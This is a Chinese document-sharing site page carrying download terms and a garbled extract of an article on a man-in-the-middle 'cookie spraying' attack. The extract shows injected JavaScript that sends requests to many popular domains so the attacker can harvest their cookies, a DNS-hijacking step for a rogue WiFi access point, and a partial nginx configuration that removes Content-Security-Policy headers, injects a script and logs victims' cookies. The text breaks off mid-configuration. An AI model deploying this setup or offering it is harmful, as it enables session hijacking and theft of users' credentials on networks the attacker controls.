中间人攻击--Cookie喷发-EtherDream.PDFVIP

  1. 1、本文档共3页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
中间人攻击--Cookie喷发-EtherDream

原原文文地地址址:/papers/12645 0x00 前前言言 分享个中间人攻击姿势,屡试不爽。 原本是篇老文,不过写的太啰 。今天用简明的文字,重新讲一遍。 0x01 原原理理 传统 cookie 嗅探,只能获得用户主动访问的站点。不访问就抓不到,效率很低。 如果流量可控,不如在用户访问的页面中注入一个脚本。通过脚本,就可以请求任意站点: #!js new Image ().src = http://anyhost 因为请求头部会带上 cookie,所以能把任意站点的 cookie 骗上流量,让中间人拿到。 0x02 爆爆发发 首先收集各大网站域名,然后挨个来一发: #!js var list = [ 163.com ...]; for (var i of list) { new Image ().src = http:// + i + /__cookie; } 这样,就能把用户各种网站的 cookie 都爆上一遍。 后端收到 /__cookie 请求,记录其中的 cookie,然后返回一个空内容。于是只需极小的流量,就可以测试一个站点。 0x03 优优化化 因为收集了各种站点,所以需要大量的域名解析。 为了让爆破更快,可以再劫持用户的 DNS 请求,暂时解析成自己 IP,这样域名查询就不用走外网。 DNS 用户 中间人 外网 HTTP 同时还有个巨大的好处:整个系统不依赖外网,可以离线劫持! 比如在没互联网的地方,开一个 WiFi 就能攻击。 0x04 演演示示 我们用 nginx 来演示: #!bash # nginx.conf http { resolver 14; ... log_format record_cookie $time_iso8601 $remote_addr $http_host $http_cookie; # 静态资源 server { listen 8080; server_name m.io; gzip on; #expires 1d; root /path/to/; } # 代理服务 server { listen 8080 default_server; server_name _; gzip on; location / { # 请求的是 html 资源,进入劫持流程 if ($http_accept ~ text/html) { rewrite ^ /__html; } # 其他资源,正常代理 proxy_pass http://$http_host; } # 页面注入 location = /__html { internal; # 压缩的内容无法 sub_filter,先解压 proxy_set_header host $http_host; proxy_pass :50000$request_uri; # 删除 CSP 头,防止被阻挡 proxy_hide_header Content-Security-Policy; # 注入脚本 sub_filter head script src=//m.io/cookie.js/scripthead; } # 记录 cookie location = /__cookie { access_log

文档评论(0)

ldj215322 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档